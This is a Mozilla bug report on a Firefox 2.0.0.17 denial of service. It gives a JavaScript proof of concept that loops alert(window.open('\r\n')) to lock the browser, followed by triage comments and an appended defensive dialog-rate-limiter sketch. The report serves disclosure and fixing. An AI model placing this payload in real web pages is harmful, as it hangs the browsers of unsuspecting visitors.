Open
Bug 460477
Opened 16 years ago
Updated 2 years ago
Mozilla 2.0.17 Denial of Service with Recursive Carriage Return Alert NULL
Categories
(Firefox :: Security, defect)
NEW
People
(Reporter: adi.zerok, Unassigned)
Details
(Whiteboard: [sg:dos])
Attachments
(1 file)
353 bytes, text/html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17
It has been observed that Firefox version 2.0.0.17 is vulnerable to a client-side flaw. When the following script is called, the browser gets into a locked state with an alert box pointing to a null object.
<script language="javascript">
while (1)
{
    alert(window.open("\r\n"));
    alert(window.open("\r\n"));
    alert(window.open("\r\n"));
    alert(window.open("\r\n"));
}
</script>
Reproducible: Always
Steps to Reproduce:
<script language="javascript">
while (1)
{
    alert(window.open("\r\n"));
    alert(window.open("\r\n"));
    alert(window.open("\r\n"));
    alert(window.open("\r\n"));
}
</script>
Actual Results:
Browser Lockdown State with Alert pointing to Null Object
Expected Results:
Denial of Service
Comment 1•16 years ago
When I try this I get an endless-alert-loop as in bug 61098 (the window.open() calls are blocked by the popup-blocker). Is that what you're seeing, or are you seeing a harder kind of lock-up?
Updated•16 years ago
Whiteboard: [sg:needinfo] dupe of bug 61098?
Reporter
Comment 2•16 years ago
That's the one aspect. Even if you remove the while loop, the stringent behavior is shown again. Of course, the browser gets locked till the process is killed manually after some time.
Reporter
Updated•16 years ago
Component: General → Security
Version: unspecified → 2.0 Branch
Reporter
Updated•16 years ago
Whiteboard: [sg:needinfo] dupe of bug 61098? →
Updated•16 years ago
Whiteboard: → [sg:low dos]
Reporter
Updated•16 years ago
Summary: Stringent Behavior : Denial of Service with Recursive Carriage Return Alert NULL → Mozilla 2.0.17 Denial of Service with Recursive Carriage Return Alert NULL
Updated•16 years ago
Group: core-security
Status: UNCONFIRMED → NEW
Depends on: alertloops
Ever confirmed: true
Whiteboard: [sg:low dos] → [sg:dos]
Comment 3•15 years ago
Updated•15 years ago
QA Contact: general → firefox
Comment 4•15 years ago
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
I tried the test case with Fx 3.6.4 and this issue is still present. :(
Please test it in nightly
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/
I think this is no longer an issue after Bug 61098 fix...
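A per-page dialog budget is one way a host can bound the endless-alert loop discussed in this thread. The sketch below is an added example, not part of the bug report or Mozilla's code; `makeDialogGuard`, its option names and the Node stand-ins for `alert` and `window.open` are assumptions made for illustration.

```javascript
// Added illustration, not Firefox code. makeDialogGuard and its options are
// hypothetical names; a real host enforces this outside the page's reach.
function makeDialogGuard(showDialog, opts = {}) {
  const { maxDialogs = 3, windowMs = 10000, now = Date.now } = opts;
  let recent = [];      // timestamps of dialogs shown inside the window
  let shown = 0;
  let suppressed = 0;
  let blocked = false;  // latched once the budget is exceeded

  function guarded(message) {
    const t = now();
    recent = recent.filter((s) => t - s < windowMs);
    if (blocked || recent.length >= maxDialogs) {
      blocked = true;   // stay quiet until reset(), e.g. on navigation
      suppressed += 1;
      return false;
    }
    recent.push(t);
    shown += 1;
    showDialog(String(message));
    return true;
  }
  guarded.stats = () => ({ shown, suppressed, blocked });
  guarded.reset = () => { recent = []; blocked = false; };
  return guarded;
}

// Constructed stand-ins so the test case's loop can run under Node:
// fakeAlert records instead of blocking, blockedOpen models the popup
// blocker making window.open() return null.
function simulateLoop(iterations, gapMs) {
  const messages = [];
  const fakeAlert = (msg) => messages.push(msg);
  const blockedOpen = () => null;
  let clock = 0;
  const alertGuard = makeDialogGuard(fakeAlert, { now: () => clock });
  for (let i = 0; i < iterations; i++) {  // bounded stand-in for while (1)
    alertGuard(blockedOpen("\r\n"));
    clock += gapMs;
  }
  return { messages, stats: alertGuard.stats() };
}

console.log(simulateLoop(1000, 5).stats);
```

A burst of calls is cut off after three dialogs, while dialogs spaced further apart than the window still get through.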
Updated•2 years ago
Severity: normal → S3